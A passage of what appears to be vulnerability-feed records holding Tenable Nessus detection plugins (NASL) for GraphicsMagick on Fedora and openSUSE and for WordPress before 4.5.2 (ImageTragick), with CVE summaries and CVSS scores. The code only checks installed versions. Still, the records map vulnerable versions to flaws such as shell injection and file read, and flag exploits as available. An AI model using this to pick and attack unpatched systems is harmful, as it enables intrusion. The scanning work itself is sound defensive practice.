value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"GraphicsMagick-1.3.32-1.fc30\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:56:13", "description": "According to its self-reported version number, the WordPress application running on the remote web server is prior to 4.5.2.\nIt is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as ImageTragick, exists in the ImageMagick library due to a failure to properly filter shell characters in filenames passed to delegate commands. A remote attacker can exploit this, via specially crafted images, to inject shell commands and execute arbitrary code.\n (CVE-2016-3714)\n\n - An unspecified flaw exists in the ImageMagick library in the 'ephemeral' pseudo protocol that allows an attacker to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the ImageMagick library in the 'ms' pseudo protocol that allows an attacker to move arbitrary files to arbitrary locations. 
(CVE-2016-3716)\n\n - An unspecified flaw exists in the ImageMagick library in the 'label' pseudo protocol that allows an attacker, via a specially crafted image, to read arbitrary files.\n (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability exists due to an unspecified flaw related to request handling between a user and the server. A remote attacker can exploit this, via an MVG file with a specially crafted fill element, to bypass access restrictions and conduct host-based attacks.\n (CVE-2016-3718)\n\n - An unspecified flaw exists in Plupload that allows an attacker to perform a same-origin method execution.\n (CVE-2016-4566)\n\n - A reflected cross-site scripting vulnerability exists in MediaElement.js due to improper validation of user-supplied input. A context-dependent attacker can exploit this, via a specially crafted request, to execute arbitrary script code in a user's browser session. (CVE-2016-4567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "WordPress < 4.5.2 Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-4566", "CVE-2016-4567"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_4_5_2.NASL", "href": "https://www.tenable.com/plugins/nessus/91101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91101);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\",\n 
\"CVE-2016-4566\",\n \"CVE-2016-4567\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866,\n 90300\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"WordPress < 4.5.2 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of WordPress.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The PHP application running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the WordPress\napplication running on the remote web server is prior to 4.5.2.\nIt is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists in the ImageMagick library due to a\n failure to properly filter shell characters in filenames\n passed to delegate commands. A remote attacker can\n exploit this, via specially crafted images, to inject\n shell commands and execute arbitrary code.\n (CVE-2016-3714)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'ephemeral' pseudo protocol that allows an attacker\n to delete arbitrary files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'ms' pseudo protocol that allows an attacker to move\n arbitrary files to arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the ImageMagick library in\n the 'label' pseudo protocol that allows an attacker, via\n a specially crafted image, to read arbitrary files.\n (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. 
A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\n\n - An unspecified flaw exists in Plupload that allows an\n attacker to perform a same-origin method execution.\n (CVE-2016-4566)\n\n - A reflected cross-site scripting vulnerability exists in\n MediaElement.js due to improper validation of\n user-supplied input. A context-dependent attacker can\n exploit this, via a specially crafted request, to\n execute arbitrary script code in a user's browser\n session. (CVE-2016-4567)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wordpress.org/news/2016/05/wordpress-4-5-2/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WordPress version 4.5.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n\n 
script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/WordPress\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"WordPress\";\nport = get_http_port(default:80, php:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { \"fixed_version\":\"3.7.14\", \"fixed_display\" : \"3.7.14 / 4.5.2\" },\n { \"min_version\":\"3.8\", \"fixed_version\":\"3.8.14\", \"fixed_display\" : \"3.8.14 / 4.5.2\" },\n { \"min_version\":\"3.9\", \"fixed_version\":\"3.9.12\", \"fixed_display\" : \"3.9.12 / 4.5.2\" },\n { \"min_version\":\"4.0\", \"fixed_version\":\"4.0.11\", \"fixed_display\" : \"4.0.11 / 4.5.2\" },\n { \"min_version\":\"4.1\", \"fixed_version\":\"4.1.11\", \"fixed_display\" : \"4.1.11 / 4.5.2\" },\n { \"min_version\":\"4.2\", \"fixed_version\":\"4.2.8\", \"fixed_display\" : \"4.2.8 / 4.5.2\" },\n { \"min_version\":\"4.3\", \"fixed_version\":\"4.3.4\", \"fixed_display\" : \"4.3.4 / 4.5.2\" },\n { \"min_version\":\"4.4\", \"fixed_version\":\"4.4.3\", \"fixed_display\" : \"4.4.3 / 4.5.2\" },\n { \"min_version\":\"4.5\", \"fixed_version\":\"4.5.2\", \"fixed_display\" : \"4.5.2\" }\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{xss:TRUE}\n);\n", 
"cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:33:53", "description": "This update for GraphicsMagick fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2017-13065: Prevent NULL pointer dereference in the function SVGStartElement (bsc#1055038)\n\n - CVE-2018-5685: Prevent infinite loop and application hang in the ReadBMPImage function. Remote attackers could leverage this vulnerability to cause a denial of service via an image file with a crafted bit-field mask value (bsc#1075939)\n\n - CVE-2017-18029: Prevent memory leak in the function ReadMATImage which allowed remote attackers to cause a denial of service via a crafted file (bsc#1076021).\n\n - CVE-2017-18027: Prevent memory leak vulnerability in the function ReadMATImage which allowed remote attackers to cause a denial of service via a crafted file (bsc#1076051).", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2018-02-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2018-122)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13063", "CVE-2017-13065", "CVE-2017-18027", "CVE-2017-18029", "CVE-2018-5685"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-12-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", 
"p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-122.NASL", "href": "https://www.tenable.com/plugins/nessus/106552", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-122.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106552);\n script_version(\"3.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-13063\", \"CVE-2017-13065\", \"CVE-2017-18027\", \"CVE-2017-18029\", \"CVE-2018-5685\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2018-122)\");\n script_summary(english:\"Check for the openSUSE-2018-122 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes several issues.\n\nThese security issues were fixed :\n\n - CVE-2017-13065: Prevent NULL pointer dereference in the\n function SVGStartElement (bsc#1055038)\n\n - CVE-2018-5685: Prevent infinite loop and application\n hang in the ReadBMPImage function. 
Remote attackers\n could leverage this vulnerability to cause a denial of\n service via an image file with a crafted bit-field mask\n value (bsc#1075939)\n\n - CVE-2017-18029: Prevent memory leak in the function\n ReadMATImage which allowed remote attackers to cause a\n denial of service via a crafted file (bsc#1076021).\n\n - CVE-2017-18027: Prevent memory leak vulnerability in the\n function ReadMATImage which allowed remote attackers to\n cause a denial of service via a crafted file\n (bsc#1076051).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1055038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1075939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076051\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-12-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-devel-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-63.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", 
"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-27T14:57:00", "description": "This update for GraphicsMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061] (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-20T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2016-602) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-11", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-11-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-3", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-602.NASL", "href": "https://www.tenable.com/plugins/nessus/91272", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update 
openSUSE-2016-602.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91272);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2016-602) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-602 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Multiple security issues in GraphicsMagick/ImageMagick\n [boo#978061] (CVE-2016-3714, CVE-2016-3718,\n CVE-2016-3715, CVE-2016-3717)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2016/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-debugsource-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-devel-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-Q16-3-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-Q16-3-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-devel-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick-Q16-3-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
